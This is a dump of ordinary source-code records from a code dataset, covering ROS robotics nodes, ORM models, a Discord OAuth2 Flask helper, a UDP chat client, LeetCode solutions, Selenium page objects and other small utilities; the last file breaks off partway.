+{"seq_id":"221835812","text":"from random import randint\n\n\n# Generator that extracts the given fields from a list of dictionaries\ndef field(items, *args):\n assert len(args) > 0\n for item in items:\n (len(args) > 1 or item[args[0]] is not None) and \\\n (yield {arg: item[arg] for arg in args if item[arg] is not None}\n if len(args) > 1 else item[args[0]])\n\n\n# Generator of a list of random numbers\ndef gen_random(begin, end, num_count):\n for _ in range(num_count):\n yield randint(begin, end)\n","sub_path":"librip/gens.py","file_name":"gens.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"647973356","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import PoseStamped, Pose\nfrom styx_msgs.msg import TrafficLightArray, TrafficLight, Waypoint\nfrom styx_msgs.msg import Lane\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\nfrom light_classification.tl_classifier import TLClassifier\nimport math\nimport sys\nimport tf\nfrom timeit import default_timer as timer\nimport yaml\n\nFREQUENCY = 10.\nMAX_DISTANCE = 100000\nSTATE_COUNT_THRESHOLD = 3\n\n\nclass TLDetector(object):\n def __init__(self):\n rospy.init_node('tl_detector')\n\n rospy.logwarn(\"### Traffic Light Detector Initialization ....\")\n\n self.pose = None\n self.waypoints = None\n self.camera_image = None\n self.lights = []\n self.image_processing_time = 0\n\n sub1 = rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)\n sub2 = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)\n\n '''\n /vehicle/traffic_lights provides you with the location of the traffic light in 3D map space and\n helps you acquire an accurate ground truth data source for the traffic light\n classifier by sending the current color state of all traffic lights in the\n simulator. When testing on the vehicle, the color state will not be available. 
You'll need to\n rely on the position of the light and the camera image to predict it.\n '''\n sub3 = rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb)\n sub6 = rospy.Subscriber('/image_color', Image, self.image_cb)\n\n config_string = rospy.get_param(\"/traffic_light_config\")\n self.config = yaml.load(config_string)\n\n self.upcoming_red_light_pub = rospy.Publisher('/traffic_waypoint', Int32, queue_size=1)\n\n self.bridge = CvBridge()\n self.light_classifier = TLClassifier()\n self.listener = tf.TransformListener()\n\n self.state = TrafficLight.UNKNOWN\n self.last_state = TrafficLight.UNKNOWN\n self.last_wp = -1\n self.state_count = 0\n\n rospy.spin()\n\n def pose_cb(self, msg):\n self.pose = msg\n\n def waypoints_cb(self, waypoints):\n self.waypoints = waypoints\n\n def traffic_cb(self, msg):\n self.lights = msg.lights\n\n def image_cb(self, msg):\n if self.image_processing_time > 0:\n self.image_processing_time -= self.hertz_to_seconds(FREQUENCY)\n return\n\n self.has_image = True\n self.camera_image = msg\n start_detection = timer()\n light_wp, state = self.process_traffic_lights()\n end_detection = timer()\n self.image_processing_time = end_detection - start_detection\n\n if self.state != state:\n self.state_count = 0\n self.state = state\n elif self.state_count >= STATE_COUNT_THRESHOLD:\n self.last_state = self.state\n\n if state == TrafficLight.RED or state == TrafficLight.YELLOW:\n light_wp = light_wp\n else:\n light_wp = -1\n\n self.last_wp = light_wp\n self.upcoming_red_light_pub.publish(Int32(light_wp))\n else:\n self.upcoming_red_light_pub.publish(Int32(self.last_wp))\n self.state_count += 1\n\n def hertz_to_seconds(self, hertz):\n return hertz / 60\n\n def get_light_state(self, light):\n if (not self.has_image):\n self.prev_light_loc = None\n return False\n\n cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, \"bgr8\")\n\n # Get classification\n predicted = self.light_classifier.get_classification(cv_image)\n\n rospy.logdebug(\"traffic light state: %d\", light.state)\n\n return predicted\n\n def get_nearest_index(self, pose, positions):\n index = -1\n min_distance = MAX_DISTANCE\n\n for i in range(len(positions)):\n dist = self.distance_between_pos(pose, positions[i].pose.pose.position)\n if dist < min_distance:\n index = i\n min_distance = dist\n\n return index\n\n def get_nearest_waypoint(self, pose):\n return self.get_nearest_index(pose, self.waypoints.waypoints)\n\n def get_nearest_stop_line(self, pose):\n return self.get_nearest_index(pose, self.get_stop_lines())\n\n def get_stop_lines(self):\n stop_lines = []\n for light_position in self.config['stop_line_positions']:\n point = Waypoint()\n point.pose.pose.position.x = light_position[0]\n point.pose.pose.position.y = light_position[1]\n point.pose.pose.position.z = 0.0\n stop_lines.append(point)\n return stop_lines\n\n def get_nearest_light(self, pose):\n return self.get_nearest_index(pose, self.lights)\n\n def distance_between_pos(self, pos_a, pos_b):\n return math.sqrt((pos_a.x - pos_b.x) ** 2 + (pos_a.y - pos_b.y) ** 2 + (pos_a.z - pos_b.z) ** 2)\n\n def process_traffic_lights(self):\n light = None\n distance_tolerance = 300\n stop_line_position = None\n\n if self.pose:\n car_index = self.get_nearest_waypoint(self.pose.pose.position)\n car_position = self.waypoints.waypoints[car_index].pose.pose.position\n\n light_index = self.get_nearest_light(car_position)\n if light_index != -1:\n light_waypoint_index = self.get_nearest_waypoint(self.lights[light_index].pose.pose.position)\n 
light_position = self.waypoints.waypoints[light_waypoint_index].pose.pose.position\n\n if light_waypoint_index > car_index:\n distance_to_traffic_light = self.distance_between_pos(car_position, light_position)\n if distance_to_traffic_light < distance_tolerance:\n light = self.lights[light_index]\n stop_line_index = self.get_nearest_stop_line(light_position)\n stop_line_position = self.get_stop_lines()[stop_line_index].pose.pose\n stop_line_waypoint = self.get_nearest_waypoint(stop_line_position.position)\n\n if light and stop_line_position:\n state = self.get_light_state(light)\n return stop_line_waypoint, state\n\n return -1, TrafficLight.UNKNOWN\n\nif __name__ == '__main__':\n try:\n TLDetector()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start traffic node.')\n","sub_path":"ros/src/tl_detector/tl_detector.py","file_name":"tl_detector.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"110736265","text":"#coding=gbk\r\n'''\r\nCreated on 2019.5.21\r\n\r\n@author: G2435\r\n'''\r\n# Division always produces a float\r\n# Python's floor-division operator is //\r\n# Exponentiation operator: **\r\n# Modulo: %\r\n# + - * / % // ** () -\r\n# Precedence (highest first): () \r\n# **\r\n# - \r\n# * / // %\r\n# + -\r\nfrom math import *\r\np = 5423.5346\r\n\r\nm = 4\r\nn = 2\r\ns = 4.9\r\nx = m/n\r\nw = m%3\r\nprint(w)\r\nq = s//n\r\nprint(x)\r\nprint(q)\r\nprint(m**s)\r\nprint(2**600)\r\n","sub_path":"Python学习基础知识/python基础/第二节:Python语言基础/数字.py","file_name":"数字.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"469809792","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\nimport json\nfrom datetime import datetime, timedelta, date\n\nfrom pony.orm import *\n\nimport gcfg\n\n#sql_debug(True)\ndb = Database()\n\nclass Repo(db.Entity):\n name = Required(unicode, unique=True)\n author = Optional(unicode)\n description = Optional(str)\n created = Optional(datetime)\n updated = Optional(datetime)\n view_count = Optional(int, default=0)\n down_count = Optional(int, default=0)\n builds = Set(\"Build\")\n\nclass Build(db.Entity):\n repo = Optional(Repo)\n downloadable = Optional(bool, default=False)\n tag = Optional(unicode)\n sha = Optional(unicode)\n updated = Optional(datetime)\n down_count = Optional(int, default=0)\n files = Set(\"File\")\n jobs = Set(\"Job\")\n latest_job = Optional(int, default=0)\n osarchs = Optional(LongStr) # json data: [{\"windows\": [\"amd64\", \"386\"], ...]\n\n status = Optional(unicode) # ?\n time_used = Optional(int) # ?\n version = Optional(unicode) #?\n\n composite_key(repo, tag)\n\nclass Job(db.Entity):\n build = Required(Build)\n status = Optional(unicode, default='initing')\n created = Optional(datetime)\n updated = Optional(datetime)\n output = Optional(LongStr, default='')\n gobuildrc = Optional(LongStr)\n\nclass File(db.Entity):\n build = Optional(Build)\n reponame = Optional(unicode)\n pkg_type = Optional(unicode, default='binary') # source or binary\n os = Optional(unicode, default='linux')\n arch = Optional(unicode, default='amd64')\n loglink = Optional(unicode)\n outlink = Optional(unicode)\n size = Optional(int, default=0)\n md5 = Optional(unicode)\n sha = Optional(unicode)\n\nclass Timer(db.Entity):\n email = Required(unicode)\n mission = Required(unicode)\n created = Optional(date)\n count = Optional(int, default=1)\n\nif gcfg.db.dbtype == 'sqlite':\n db.bind('sqlite', 
'./test_db.sqlite', create_db=True)\nelse:\n db.bind(gcfg.db.dbtype, \n host=gcfg.db.host, \n user=gcfg.db.username, \n passwd=gcfg.db.password, \n db=gcfg.db.dbname)\n\ndb.generate_mapping(create_tables=True)\n\nif __name__ == '__main__':\n with db_session:\n repo = Repo(name='github.com/gobuild/got')\n repo.author = 'lunny'\n repo.description = 'this is sample repo'\n repo.updated = datetime.today()\n repo.view_count = 10\n repo.down_count = 7\n\n build = Build(repo=repo)\n build.tag = 'branch:master'\n build.sha = 'slkjfaefr3jr2134j2l3krj'\n build.time_used = 1024\n build.updated = datetime.today()\n build.downloadable = False\n build.down_count = 3\n build.details = 'lslxlsla build.....'\n build.version = 'go 1.3.1rc'\n\n file = File(build=build)\n file.reponame = repo.name\n file.pkg_type = 'binary'\n file.os='windows'\n file.arch = 'amd64'\n file.outlink = 'http://www.baidu.com'\n file.loglink = 'http://www.baidu.com'\n file.md5 = 'slkjfl213kj4124'\n file.sha = 'sssshhhhsej23423467890'\n file.size = 1025\n\n build = Build(repo=repo)\n build.tag = 'tag:v1.0.2'\n build.sha = 'ssssslkjfaefr3134j2l3krj'\n build.time_used = 104\n build.updated = datetime.today()\n build.down_count = 2\n build.downloadable = True\n build.status = 'build error'\n build.osarchs = '[[\"windows\", [\"amd64\", \"arm\"]], [\"linux\", [\"amd64\"]]]'\n\n@db_session\ndef add_record(phoneno, jsondata):\n ''' True or False '''\n phone = Phone.get(number=phoneno)\n if not phone:\n return False\n args = dict(phone=phone,\n created = datetime.fromtimestamp(time.time()),\n data = json.dumps(jsondata))\n JobRecord(**args)\n return True\n\n@db_session\ndef get_latest_record(devno, strdatetime):\n ''' None or data '''\n stamp = time.mktime(time.strptime(strdatetime, '%Y-%m-%d'))\n start_time = datetime.fromtimestamp(stamp)\n to_time = start_time + timedelta(days=1)\n latest = select(p for p in JobRecord if p.created > start_time and \n p.created < to_time and p.phone.number == devno).order_by(desc(JobRecord.created))[:1]\n if not latest:\n return None\n latest = latest[0]\n return dict(phoneno=latest.phone.number, created=latest.created, data=json.loads(latest.data))\n\n@db_session\ndef get_timers(email):\n return select(t for t in Timer if t.email == email)[:]\n","sub_path":"web/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"366842552","text":"import os, sys, ctypes\nfrom flask import Flask, g, session, redirect, request, url_for, jsonify\nfrom requests_oauthlib import OAuth2Session\nfrom waitress import serve\n\nctypes.windll.kernel32.SetConsoleTitleW(\"Anti-Cheat OAuth2 module\")\n\nOAUTH2_CLIENT_ID = sys.argv[1]\nOAUTH2_CLIENT_SECRET = sys.argv[2]\nHOST = sys.argv[3]\nPORT = sys.argv[4]\nREDIRECT_URL = sys.argv[5]\nOAUTH2_REDIRECT_URI = 'http://' + HOST + ':' + PORT + '/callback'\n\nAPI_BASE_URL = os.environ.get('API_BASE_URL', 'https://discordapp.com/api')\nAUTHORIZATION_BASE_URL = API_BASE_URL + '/oauth2/authorize'\nTOKEN_URL = API_BASE_URL + '/oauth2/token'\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = OAUTH2_CLIENT_SECRET\n\nif 'http://' in OAUTH2_REDIRECT_URI:\n os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = 'true'\n\n\ndef token_updater(token):\n session['oauth2_token'] = token\n\n\ndef make_session(token=None, state=None, scope=None):\n return OAuth2Session(\n client_id=OAUTH2_CLIENT_ID,\n token=token,\n state=state,\n scope=scope,\n redirect_uri=OAUTH2_REDIRECT_URI,\n 
auto_refresh_kwargs={\n 'client_id': OAUTH2_CLIENT_ID,\n 'client_secret': OAUTH2_CLIENT_SECRET,\n },\n auto_refresh_url=TOKEN_URL,\n token_updater=token_updater)\n\n\n@app.route('/')\ndef index():\n scope = request.args.get(\n 'scope',\n 'identify guilds')\n discord = make_session(scope=scope.split(' '))\n authorization_url, state = discord.authorization_url(AUTHORIZATION_BASE_URL)\n session['oauth2_state'] = state\n return redirect(authorization_url)\n\n\n@app.route('/callback')\ndef callback():\n if request.values.get('error'):\n return request.values['error']\n discord = make_session(state=session.get('oauth2_state'))\n token = discord.fetch_token(\n TOKEN_URL,\n client_secret=OAUTH2_CLIENT_SECRET,\n authorization_response=request.url)\n session['oauth2_token'] = token\n return redirect(url_for('.me'))\n\n\n@app.route('/me')\ndef me():\n discord = make_session(token=session.get('oauth2_token'))\n guilds = discord.get(API_BASE_URL + '/users/@me/guilds').json()\n identify = discord.get(API_BASE_URL + '/users/@me').json()\n userid = str(identify['id'])\n f=open(\"servers_lists\\\\\" + userid + \"_servers_list.txt\", \"w+\", encoding=\"utf-8\")\n for entry in guilds:\n f.write(entry['id'] + '\\n')\n f.close()\n return redirect(REDIRECT_URL)\n\nserve(app, host=\"0.0.0.0\", port=PORT)\n","sub_path":"scripts/oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"411019113","text":"import WRF_Hydro_forcing as whf\nimport logging\nimport os\nimport sys\nimport re\nfrom ConfigParser import SafeConfigParser\nimport optparse\nimport shutil\n\n\"\"\"Short_Range_Forcing\nPerforms regridding,downscaling, bias\ncorrection (if needed), and layering/mixing \nof data products associated with the Short Range\nforcing configuration. Invokes methods in the\nWRF_Hydro_forcing module and input parameters\nthat are defined in the wrf_hydro_forcing.parm\nparameter/configuration file. Logs to a log\nfile that is created in the same directory\nfrom where this script is executed.\n\"\"\"\n\ndef forcing(action, prod, file, prod2=None, file2=None):\n \"\"\"Performs the action on the given data\n product and corresponding input file.\n\n Args:\n action (string): Supported actions are:\n 'regrid' - regrid and downscale\n 'bias' - bias correction \n (requires two \n products and two files)\n 'layer' - layer (requires two\n products and two files)\n prod (string): The first product [mandatory option]:\n (HRRR or RAP)\n file (string): The file name (full path not necessary,\n this is derived from the Python config/\n param file and the YYYYMMDD portion of \n the file name).\n\n prod2 (string): The second product (RAP or HRRR), default\n is None. 
Required for layering.\n file2 (string): The second file name, required for \n layering, default is None.\n Returns:\n None Performs the indicated action on the\n files based on the type of product and\n any other relevant information provided\n by the Python config/param file,\n wrf_hydro_forcing.parm\n \n \n \"\"\"\n\n # Read the parameters from the config/param file.\n parser = SafeConfigParser()\n parser.read('/d4/karsten/DFE/wrf_hydro_forcing/parm/wrf_hydro_forcing.parm')\n\n # Set up logging, environments, etc.\n forcing_config_label = \"Short_Range\"\n logging = whf.initial_setup(parser,forcing_config_label)\n\n\n # Extract the date, model run time, and forecast hour from the file name\n # Use the fcsthr to process only the files that have a fcst hour less than\n # the max fcst hr defined in the param/config file.\n \n \n # Convert the action to lower case \n # and the product name to upper case\n # for consistent checking\n action_requested = action.lower()\n product_data_name = prod.upper()\n if action == 'regrid': \n # Get the finished directory locations for the relevant product.\n if prod == 'RAP':\n regridded_dir = parser.get('regridding', 'RAP_output_dir')\n downscale_dir = parser.get('downscaling', 'RAP_downscale_output_dir')\n finished_downscale_dir = parser.get('downscaling', 'RAP_finished_output_dir')\n downscale_input_dir = parser.get('downscaling', 'RAP_data_to_downscale')\n \n elif prod == 'HRRR':\n regridded_dir = parser.get('regridding', 'HRRR_output_dir')\n downscale_dir = parser.get('downscaling', 'HRRR_downscale_output_dir')\n finished_downscale_dir = parser.get('downscaling', 'HRRR_finished_output_dir')\n downscale_input_dir = parser.get('downscaling', 'HRRR_data_to_downscale')\n\n\n (date,modelrun,fcsthr) = whf.extract_file_info(file)\n # Determine whether this current file lies within the forecast range\n # for the data product (e.g. if processing RAP, use only the 0hr-18hr forecasts).\n # Skip if this file has a forecast hour greater than the max indicated in the \n # parm/config file.\n in_fcst_range = whf.is_in_fcst_range(prod, fcsthr, parser)\n\n if in_fcst_range:\n # Check for RAP or GFS data products. If this file is\n # a 0 hr fcst and is RAP or GFS, substitute each 0hr forecast\n # with the file from the previous model run and the same valid\n # time. This is necessary because there are missing variables\n # in the 0hr forecasts (e.g. precip rate for RAP and radiation\n # in GFS).\n \n logging.info(\"Regridding and Downscaling for %s\", product_data_name)\n # Determine if this is a 0hr forecast for RAP data (GFS is also missing\n # some variables for 0hr forecast, but GFS is not used for Short Range\n # forcing). We will need to substitute this file for the downscaled\n # file from a previous model run with the same valid time. 
\n # We only need to do this for downscaled files, as the Short Range \n forcing files that are regridded always get downscaled and we don't want\n to do this for both the regridding and downscaling.\n if fcsthr == 0 and prod == 'RAP':\n logging.info(\"Regridding, ignoring f0 RAP files \" )\n regridded_file = whf.regrid_data(product_data_name, file, parser, True)\n\n # Downscaling...\n stat= whf.downscale_data(product_data_name,regridded_file, parser, True, True)\n if (stat == 0):\n # Move the finished downscaled file to the \"finished\" area so the triggering\n # script can determine when to layer with other data.\n match = re.match(r'.*/([0-9]{10})/([0-9]{12}.LDASIN_DOMAIN1.nc)',regridded_file)\n if match:\n downscaled_dir = finished_downscale_dir + \"/\" + match.group(1)\n input_dir = downscale_dir + \"/\" + match.group(1)\n if not os.path.exists(downscaled_dir):\n whf.mkdir_p(downscaled_dir)\n downscaled_file = downscaled_dir + \"/\" + match.group(2)\n input_file = input_dir + \"/\" + match.group(2)\n whf.move_to_finished_area(parser, prod, input_file) \n else:\n logging.error(\"FAIL- cannot move finished file: %s\", regridded_file) \n return \n else:\n logging.error(\"FAIL could not downscale data for hour 0 RAP\")\n # Remove empty 0hr regridded file if it still exists\n if os.path.exists(regridded_file):\n cmd = 'rm -rf ' + regridded_file\n status = os.system(cmd)\n if status != 0:\n logging.error(\"ERROR: Failure to remove empty file: \" + regridded_file)\n return\n\n else:\n regridded_file = whf.regrid_data(product_data_name, file, parser, False)\n # Downscaling...\n whf.downscale_data(product_data_name,regridded_file, parser,True, False) \n # Move the downscaled file to the finished location \n match = re.match(r'.*/([0-9]{10})/([0-9]{12}.LDASIN_DOMAIN1.nc)',regridded_file)\n if match:\n full_dir = finished_downscale_dir + \"/\" + match.group(1)\n input_dir = downscale_dir + \"/\" + match.group(1)\n full_input_file = input_dir + \"/\" + match.group(2)\n full_finished_file = full_dir + \"/\" + match.group(2)\n if not os.path.exists(full_dir):\n logging.info(\"finished dir doesn't exist, creating it now...\")\n whf.mkdir_p(full_dir)\n logging.info(\"Moving now, source = %s\", full_input_file)\n whf.move_to_finished_area(parser, prod, full_input_file)\n #whf.move_to_finished_area(parser, prod, full_finished_file)\n else:\n logging.error(\"FAIL- cannot move finished file: %s\", full_finished_file) \n return\n\n else:\n # Skip processing this file, exiting...\n logging.info(\"INFO [Short_Range_Forcing]- Skip processing, requested file is outside max fcst\")\n elif action_requested == 'layer':\n logging.info(\"Layering requested for %s and %s\", prod, prod2)\n # Do some checking to make sure that there are two data products \n # and two files indicated.\n if prod2 is None:\n logging.error(\"ERROR [Short_Range_Forcing]: layering requires two products\")\n return\n elif file2 is None:\n logging.error(\"ERROR [Short_Range_Forcing]: layering requires two input files\")\n return\n else:\n # We have everything we need, request layering\n whf.layer_data(parser,file, file2, prod, prod2, 'Short_Range')\n whf.rename_final_files(parser,'Short_Range')\n \n elif action_requested == 'bias':\n logging.info(\"Bias correction requested for %s\", file)\n logging.info(\"Bias correction not supported for Short Range Forcing\")\n \n\n\n\n \n \n#-------------------------- \n \n \nif __name__ == \"__main__\":\n forcing()\n 
\n\n","sub_path":"scripts/Python/Short_Range_Forcing.py","file_name":"Short_Range_Forcing.py","file_ext":"py","file_size_in_byte":9444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"653575726","text":"import threading\nimport time\nimport socket\nimport select\n#create a lock for the thread\ntLock = threading.Lock()\n#we will use the varuable for exiting the program\nexiting = False\n\n\ndef receving(name, sock):\n while not exiting:\n try:\n tLock.acquire()\n while True:\n data, addr = sock.recvfrom(1024)\n print(str(data).encode(\"UTF-8\"))\n except:\n pass\n #release the thread lock regardless\n finally:\n tLock.release()\n\nhost = '127.0.0.1'\nport = 0\n\nserver = ('127.0.0.1', 5000)\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.bind((host, port))\ns.setblocking(0)\n\n#creating a receiving thread\nrT = threading.Thread(target=receving, args=(\"recvThread\", s))\nrT.start()\n\nusername = input('How would you like to be called? \\n')\nmessage = input(username +\": \")\n\nwhile message != 'e':\n # check if the message is empty or not\n if message != '':\n sendmessage = username + \": \" + message\n s.sendto(sendmessage.encode('UTF-8'), server)\n tLock.acquire()\n message = input(username + \": \\n\")\n # release the lock\n tLock.release()\n time.sleep(0.2)\n\nexiting = True\nrT.join()\ns.close()\n","sub_path":"s/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"63415483","text":"class Solution(object):\n def isSameTree(self, p, q):\n stack = [(p, q)]\n while stack:\n node1, node2 = stack.pop()\n if node1 and node2 and node1.val == node2.val:\n stack += [(node1.left, node2.left)]\n stack += [(node1.right, node2.right)]\n else:\n if node1 != node2:\n return False\n return True\n","sub_path":"100/100.same-tree.260745769.Accepted.leetcode.py","file_name":"100.same-tree.260745769.Accepted.leetcode.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"615621154","text":"\"\"\"\n문제:\n Given an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\n\n You may assume that each input would have exactly one solution, and you may not use the same element twice.\n\n You can return the answer in any order.\n\n제한:\n 2 <= nums.length <= 104\n -109 <= nums[i] <= 109\n -109 <= target <= 109\n Only one valid answer exists.\n입력:\n -\n출력:\n -\n시작:\n 9.15 01:50\n소요시간:\n 15분\n\"\"\"\nfrom typing import List\n\n# O(N^2)이하로 만들어보자.\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n dict = {}\n for i, num in enumerate(nums):\n dict[num] = i\n\n for i, num in enumerate(nums):\n if target-num in dict and i != dict[target-num]:\n return [i, dict[target-num]]","sub_path":"Codesik/linear_data_structure/LTC_two_sum.py","file_name":"LTC_two_sum.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"489636469","text":"import time\nfrom dji_asdk_to_python.products.aircraft import Aircraft\n\n\nAPP_IP = \"192.168.0.109\"\n\ndrone = Aircraft(APP_IP)\ngimbal = drone.getGimbal()\n\n\nfor i in range(10):\n print(\"iteration %s\" % i)\n if i % 2 == 0:\n gimbal.rotate(pitch=-90, roll=0, yaw=0)\n else:\n gimbal.rotate(pitch=0, roll=0, yaw=0)\n 
time.sleep(2)\n","sub_path":"examples/rotate_gimbal.py","file_name":"rotate_gimbal.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"123604710","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom http import client\nimport requests\nfrom requests.adapters import HTTPAdapter\n\nlogger = logging.getLogger(__name__)\n\nclient.HTTPConnection._http_vsn=11\nclient.HTTPConnection._http_vsn_str='HTTP/1.1'\n\n\ndef get_http_session():\n http_session = requests.Session()\n http_session.mount('http://', HTTPAdapter(pool_connections=100, pool_maxsize=100, max_retries=3))\n http_session.mount('https://', HTTPAdapter(pool_connections=100, pool_maxsize=100, max_retries=3))\n return http_session\n\ndef request_get(http_session, url, headers=None):\n logger.info(\"HTTP GET: {}\".format(url))\n return http_session.get(url, headers=headers, timeout=(5, 15))\n\ndef request_post(http_session, url, data=None, json=None):\n logger.info(\"HTTP POST: {}\".format(url))\n return http_session.post(url=url, data=data, json=json, timeout=(5, 15))","sub_path":"zvt/utils/request_utils.py","file_name":"request_utils.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"30918887","text":"from tests.personal_data.page_component import Page, Component\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\nclass MainForm(Component):\n PERSONAL_DATA = '//*[@data-test-id=\"personal-card\"]//*[@data-test-id=\"card-footer\"]'\n CONTACTS = '//*[@data-test-id=\"contacts-card\"]//*[@data-test-id=\"card-footer\"]'\n PERSONAL_DATA_CONTAINER = '//*[@data-test-id=\"mailid-profile-container\"]'\n CONTACTS_CONTAINER = '//*[@data-test-id=\"mailId-contacts-wrapper\"]'\n\n def open_contacts(self):\n contacts_link = WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(self.CONTACTS)\n )\n\n contacts_link.click()\n\n def open_personal_data(self):\n personal_data_link = WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(self.PERSONAL_DATA)\n )\n\n personal_data_link.click()\n\n def check_personal_data_opened(self):\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(self.PERSONAL_DATA_CONTAINER)\n )\n\n def check_contacts_opened(self):\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(self.CONTACTS_CONTAINER)\n )\n\n\nclass MainPage(Page):\n PATH = ''\n\n @property\n def form(self):\n return MainForm(self.driver)\n","sub_path":"tests/personal_data/src/main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"28275650","text":"\n\n\n# Given a m x n grid filled with non-negative numbers, find a path from top left to bottom right which minimizes the sum of all numbers along its path.\n# You can only move either down or right at any point in time.\n\nclass Solution:\n \"\"\"\n @param grid: a list of lists of integers\n @return: An integer, minimizes the sum of all numbers along its path\n \"\"\"\n def minPathSum(self, grid):\n # write your code here\n # 1D-DP\n m, n = len(grid), len(grid[0])\n dp = [0] * n\n dp[0] = grid[0][0]\n for j in range(1, n):\n dp[j] = dp[j - 1] + grid[0][j]\n \n for i in range(1, m):\n dp[0] += grid[i][0]\n for j in range(1, n):\n dp[j] = min(dp[j - 1], dp[j]) + grid[i][j]\n \n return 
dp[n - 1]","sub_path":"Minimum Path Sum.py","file_name":"Minimum Path Sum.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"451399482","text":"import itertools\nimport json\nfrom dataclasses import dataclass\nfrom typing import Dict\n\nfrom cloudshell.cp.core.request_actions import models\n\n\n@dataclass\nclass DeployedVMActions:\n REGISTERED_DEPLOYMENT_PATH_MODELS = {} # type: Dict[str, models.DeployedApp]\n deployed_app: models.DeployedApp = None\n\n @classmethod\n def register_deployment_path(cls, deployment_path_cls):\n \"\"\"Register deployment path class.\n\n :param cloudshell.cp.core.models.DeployedApp deployment_path_cls:\n :return:\n \"\"\"\n cls.REGISTERED_DEPLOYMENT_PATH_MODELS[\n deployment_path_cls.DEPLOYMENT_PATH\n ] = deployment_path_cls\n\n @classmethod\n def from_data(cls, app_request_data, deployed_app_data, cs_api):\n \"\"\"Create DeployedApp from the dictionaries.\n\n :param dict|None app_request_data: in the static App app_request is empty\n :param dict deployed_app_data:\n :param cloudshell.api.cloudshell_api.CloudShellAPISession cs_api:\n :rtype: DeployedVMActions\n \"\"\"\n model = deployed_app_data[\"model\"]\n app_request_attrs = {}\n deployment_service_model = model\n if app_request_data:\n app_request_attrs = app_request_data[\"deploymentService\"][\"attributes\"]\n deployment_service_model = app_request_data[\"deploymentService\"][\"model\"]\n attributes = {\n attr[\"name\"]: attr[\"value\"]\n for attr in itertools.chain(\n deployed_app_data[\"attributes\"],\n app_request_attrs,\n )\n }\n\n deployed_app_cls = cls.REGISTERED_DEPLOYMENT_PATH_MODELS.get(\n deployment_service_model, models.DeployedApp\n )\n\n deployed_app = deployed_app_cls(\n family=deployed_app_data[\"family\"],\n model=model,\n name=deployed_app_data[\"name\"],\n cs_api=cs_api,\n deployment_service_model=deployment_service_model,\n private_ip=deployed_app_data[\"address\"],\n attributes=attributes,\n vmdetails=models.VMDetails.from_dict(deployed_app_data[\"vmdetails\"]),\n )\n\n return cls(deployed_app=deployed_app)\n\n @classmethod\n def from_remote_resource(cls, resource, cs_api):\n \"\"\"Create DeployedApp from the resource.\n\n :param cloudshell.api.cloudshell_api.CloudShellAPISession cs_api:\n :param cloudshell.shell.core.driver_context.ResourceContextDetails resource:\n :rtype: DeployedVMActions\n \"\"\"\n app_request_json = resource.app_context.app_request_json\n app_request_data = json.loads(app_request_json) if app_request_json else None\n return cls.from_data(\n app_request_data=app_request_data,\n deployed_app_data=json.loads(resource.app_context.deployed_app_json),\n cs_api=cs_api,\n )\n","sub_path":"cloudshell/cp/core/request_actions/deployed_vm.py","file_name":"deployed_vm.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"67387770","text":"import random\n\nfrom project.windows.cloppy_window import CloppyButtonWindow\nfrom project.windows.cloppy_window_events import CloppyChoiceMadeEventData\n\nfrom project.windows.editor_window_events import NewWordEventData\n\nfrom project.spelling.correction import correction\nfrom project.spelling.misspell import misspell\n\n\nclass CloppySpellingWindow(CloppyButtonWindow):\n \"\"\"\n This class represents individual Cloppy windows used to suggest spelling\n corrections to the user.\n 